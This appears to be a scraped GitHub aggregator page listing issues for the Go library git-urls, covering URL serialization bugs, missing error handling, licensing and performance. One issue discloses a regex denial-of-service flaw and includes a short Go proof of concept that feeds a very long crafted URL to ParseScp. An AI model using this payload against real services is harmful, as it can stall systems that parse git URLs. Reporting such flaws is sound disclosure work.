whilp / git-urls Goto Github PK
View Code? Open in Web Editor NEWgit-urls parses git URLs
Home Page: http://godoc.org/github.com/whilp/git-urls
License: MIT License
git-urls parses git URLs
Home Page: http://godoc.org/github.com/whilp/git-urls
License: MIT License
If you parse a git URL without Userinfo
and then convert it back to string you get an extra "@" symbol.
Consider the following code:
parsed, err := giturls.Parse("https://github.com/whilp/git-urls")
if err != nil {
log.Fatal(err)
}
fmt.Println("Url with extra '@':", parsed.String())
parsed.User = nil // set userinfo to nil
fmt.Println("Correct url:", parsed.String())
Output:
Url with extra '@': https://@github.com/whilp/git-urls
Correct url: https://github.com/whilp/git-urls
Full runnable code: https://github.com/curusarn/go-git-urls-issue/blob/master/main.go
Are there any drawbacks to setting Userinfo
to nil
?
The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside directory path of the git url. I managed to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:
var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := "6en6ar@-:0////" + payload + "\"
begin := time.Now()
//u, err := giturls.ParseScp("[email protected]:/remote/directory")// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
}
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)
parsing invalid URLs doesn't return errors e.g.
u, err := giturls.Parse("https:/lala")
Currently, it's not possible to view the docs at https://pkg.go.dev/github.com/whilp/git-urls?tab=overview.
This should be fixable by adding a LICENSE file.
Per @anachronistic:
so - i did a couple of benchmarks on the lib and found differing speeds + heap allocations depending on the incoming string
and i believe that it's possible to 1) normalize the speed to within reason (i.e. longer strings will naturally take a bit longer to parse), 2) normalize the allocations (i believe you can produce a 0 allocation lib if you write the parser yourself)
i did a shit proof of concept and for local paths i had it down to 150ns / 0 allocations by having aParse
method that accepts a pointer to anet.URL
structure ... exfunc Parse(url string, handle *net.URL) error { ... }
that was leaning mostly onstrings.Index
which reports first appearance of a pattern, so ex.colon := strings.Index(url, ":") ... slash := strings.Index(url, "/") ... return colon == -1 || (slash & slash > colon)
sofile:///whatever
and/foo/bar/whatever
returnedtrue
very quickly
it gets a touch more complicated from there, but yeah: that's my challenge to you ... normalized speed (for some reasonable definition of normalized compared to string length) and 0 allocations (or at most 1 if you don't like the C-style of passing in the structure)
Thank you for making this library. It looks like it does just what I was looking for. Would you be willing to add a license file?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.